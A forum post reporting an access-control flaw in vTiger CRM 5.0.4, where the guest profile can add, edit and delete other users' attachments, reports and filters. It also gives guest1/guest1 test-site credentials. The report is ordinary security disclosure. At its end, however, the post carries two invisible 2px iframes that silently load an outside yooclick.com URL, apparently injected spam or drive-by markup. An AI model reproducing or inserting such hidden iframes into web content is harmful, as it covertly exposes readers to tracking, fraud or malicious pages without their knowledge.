Critical security feature - attachment, reports, filters

Attachments

Anyone, even the guest profile, even without insert/delete permission on modules, can insert and delete attachments, even those inserted by other users.

Reports
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit reports, even those inserted by other users.

Filters
Anyone, even the guest profile, even without insert/delete/edit permission on modules, can insert, delete and edit filters, even those inserted by other users.

In a old post on this forum someone told me that this was a good feature and a ticket has been opened, but on the 5.0.4 test site
<!-- m --><a class="postlink" href="http://en.vtiger.com/wip">http://en.vtiger.com/wip</a><!-- m -->
all stilll 'works" on the same way.
I've just created the guest1 user (password guest1) with the guest profile
and I've deleted some default filters, I've edited default reports and deleted custom reports created from other users, deleted other users's attachments, and so on... all having just the guest profile.
I'm using vTiger in my organization since march 2007, but I'm having seriuos security problem because of this lack and I really hope that this feature will be implemented as soon as possible.
Thank You <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;
«1

Comments

Sign In or Register to comment.